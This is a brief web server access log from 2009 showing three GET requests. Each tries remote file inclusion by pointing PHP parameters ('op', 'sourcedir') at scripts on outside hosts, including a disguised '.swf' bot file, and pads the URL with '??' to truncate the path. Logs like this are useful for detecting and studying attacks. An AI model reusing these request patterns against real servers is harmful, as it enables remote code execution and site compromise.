213.189.2.38 - - [21/Jun/2009:01:28:03 -0400] "GET /index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:01:28:42 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:01:28:42 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
